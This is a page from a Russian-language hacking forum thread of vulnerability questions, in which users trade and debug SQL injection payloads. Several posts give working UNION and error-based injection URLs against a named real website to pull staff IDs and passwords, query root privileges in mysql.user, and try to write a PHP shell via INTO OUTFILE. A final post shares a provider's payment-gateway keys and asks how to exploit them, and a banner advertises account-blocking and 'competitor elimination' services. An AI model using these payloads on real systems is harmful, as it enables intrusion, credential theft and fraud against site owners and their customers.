УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 2369 из 2438

2369

Опции темы

Поиск в этой теме

Опции просмотра

#23681

28.07.2014, 14:03

XAMEHA

Новичок

Регистрация: 15.05.2010

Сообщений: 0

Провел на форуме:
2268

Репутация: 0

Цитата:

Сообщение от Br@!ns

Br@!ns said:
поля для вывода присутствуют, данные о таблицах и колонках выводятся. Но при попытке вывести данные с любых других таблиц (основной базы) эти поля остаются пустыми.

Что значит пустыми? Такого просто не бывает, причина в чем то другом, возможно в последующий обработке этих данных.

Посмотрите типы полей (COLUMN_TYPE), попробуйте count(*), length(name), hex(name) и т.п. конструкции.

#23682

28.07.2014, 14:04

Br@!ns

Guest

Сообщений: n/a

Провел на форуме:
179197

Репутация: 25

Пустой ответ, например

Код HTML:

HTML:
id=-371+Union(Select+1,staff_id,3,password,5,6,7,8,9,10+from+staff)+--+

в исходном коде обнаружил, что отображается полный запрос скрипта

Код HTML:

HTML:

#23683

28.07.2014, 14:09

YaBtr

Guest

Сообщений: n/a

Провел на форуме:
132418

Репутация: 652

Цитата:

Сообщение от Br@!ns

Br@!ns said:
Столкнулся с проблемой

Код HTML:

HTML:
...id=-371+Union(Select+1,user(),3,table_name,5,6,7,8,9,10+from+%60information_schema%60.tables)+--+

поля для вывода присутствуют, данные о таблицах и колонках выводятся. Но при попытке вывести данные с любых других таблиц (основной базы) эти поля остаются пустыми. При неверном построении запроса, вылазиет sql ошибка, так что запросы составляю верно. Какие есть пути вытягивания данных, кроме посимвольного перебора?

Проблема либо в кодировке, либо в типах данных.

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"]aes_decrypt[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]aes_encrypt[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]column_name[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]),[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"])

[/COLOR][COLOR="#0000BB"]unhex[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]hex[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]column_name[/COLOR][COLOR="#007700"]))[/COLOR][/COLOR]

#23684

28.07.2014, 14:29

Br@!ns

Guest

Сообщений: n/a

Провел на форуме:
179197

Репутация: 25

Ничего не помогает(

Вот примеры обоих запросов, уже самомоу интересно что там) глянете мб

Код HTML:

HTML:
http://bplampsupply.com/search.php?category_id=-371+Union(Select+1,user(),3,column_name,5,6,7,8,9,10+from+%60information_schema%60.columns+where+TABLE_NAME='staff')+--+
http://www.bplampsupply.com/search.php?category_id=-371+Union(Select+1,staff_id,3,password,5,6,7,8,9,10+from+staff)+--+

#23685

28.07.2014, 14:49

YaBtr

Guest

Сообщений: n/a

Провел на форуме:
132418

Репутация: 652

Цитата:

Сообщение от Br@!ns

Br@!ns said:
Ничего не помогает(
Вот примеры обоих запросов, уже самомоу интересно что там) глянете мб

Код HTML:

HTML:
http://bplampsupply.com/search.php?category_id=-371+Union(Select+1,user(),3,column_name,5,6,7,8,9,10+from+%60information_schema%60.columns+where+TABLE_NAME='staff')+--+
http://www.bplampsupply.com/search.php?category_id=-371+Union(Select+1,staff_id,3,password,5,6,7,8,9,10+from+staff)+--+

У Вас таблица пустая.

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"]371[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]Union[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]Select[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]user[/COLOR][COLOR="#007700"](),[/COLOR][COLOR="#0000BB"]3[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]table_rows[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]5[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]6[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]7[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]8[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]9[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]10[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]from[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]information_schema[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]tables[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]where[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]TABLE_NAME[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]0x7374616666[/COLOR][COLOR="#007700"])+--+[/COLOR][/COLOR]

#23686

31.07.2014, 14:06

Evil_Genius

Новичок

Регистрация: 03.08.2009

Сообщений: 23

Провел на форуме:
189651

Репутация: -5

Добрый день!

Помогите с построением запроса

Цитата:

Сообщение от None

' and(select 1 from(select count(*),concat((select (select mid( concat(file_priv),1,100) from mysql.user where user='tt') ),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and '1'='1

выводится нормально N у пользователя tt

Когда хочу вывести пользователя root

Цитата:

Сообщение от None

' and(select 1 from(select count(*),concat((select (select mid( concat(file_priv),1,100) from mysql.user where user='root') ),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and '1'='1

выводится ошибка

Обнаружены слудующие ошибки: Subquery returns more than 1 row

Подскажите как правильно составить запрос для вывода нужной инфы.

------------

Так же пробовал сделать заливку файла через скуль - опять такие не нравится((

Цитата:

Сообщение от None
' and(select 1 from(select count(*),concat((select (select (select mid( concat(''),1,100) from mysql.user into outfile '/home/site.ru/uploads/s.php' limit 1) ) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and '1'='1

Выводится ошибка:

Обнаружены слудующие ошибки: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'limit 1) ) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `' at line 1

Цитата:

Сообщение от None
' and(select 1 from(select count(*),concat((select (select mid( concat(''),1,100) from mysql.user into outfile '/home/site.ru/uploads/s.php') ),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and '1'='1

так выводится

Обнаружены слудующие ошибки: Subquery returns more than 1 row

#23687

31.07.2014, 15:17

XAMEHA

Новичок

Регистрация: 15.05.2010

Сообщений: 0

Провел на форуме:
2268

Репутация: 0

Цитата:

Сообщение от Evil_Genius

Evil_Genius said:
Так же пробовал сделать заливку файла через скуль - опять такие не нравится((

Заливка выполняется без подзапросов. См. статьи по SQL-инъекциям.

Живой пример: https://forum.antichat.net/showthread.php?p=3741323#post3741323

Цитата:

Сообщение от Evil_Genius

Evil_Genius said:
Subquery returns more than 1 row

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"]WHERE user[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'root'[/COLOR][COLOR="#0000BB"]LIMIT 1

[/COLOR][/COLOR]

В таблице mysql.user несколько записей, где user='root'. Обычно у них разные хосты (localhost, 127.0.0.1, ::1, site.com, ...).

#23688

01.08.2014, 14:59

psihoz26

Guest

Сообщений: n/a

Провел на форуме:
182660

Репутация: 324

Посоветуйте пожалуйста метод заливки через error based у mysql

#23689

01.08.2014, 16:26

XAMEHA

Новичок

Регистрация: 15.05.2010

Сообщений: 0

Провел на форуме:
2268

Репутация: 0

Цитата:

Сообщение от psihoz26

psihoz26 said:
Посоветуйте пожалуйста метод заливки через error based у mysql

Error-based - метод вывода информации. Для заливки вывод не нужен, используйте стандартные способы (см. ссылку выше).

Ещё есть что-то вроде такого:

https://rdot.org/forum/showpost.php?p=8510&postcount=2

Но не указаны версии, на новых данный способ неработоспособен.

#23690

02.08.2014, 14:24

BuG_4F

Участник форума

Регистрация: 20.05.2008

Сообщений: 144

Провел на форуме:
1436858

Репутация: 171

Отправить сообщение для BuG_4F с помощью ICQ

У одного провайдера нашёл в конфигах следующую инфу:

Цитата:

Сообщение от None

CHRONOPAY_SETTINGS
{'cb_type': 'G',
'cb_url': 'https://pay.***.ru/onyma_payment_gate/chronopay_gate',
'currency': '',
'group_settings': {'5100150000***': {'cb_url': 'https://pay.***.ru/onyma_payment_gate/chronopay_gate_psi',
'product_id': '******-****-****',
'skey': '**********'},
'5100150000000000179012': {'cb_url': 'https://pay.***.ru/onyma_payment_gate/chronopay_gate_psi',
'product_id': '******-****-****',
'skey': '**********'}},
'product_id': '******-****-****',
'skey': '**************',
'submit_url': 'https://payments.chronopay.com'}

Как я понял - это кеи к платёжному шлюзу и собственно его линк.

Вопрос - что можно интересного сделать с этим ?

Страница 2369 из 2438

2369

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход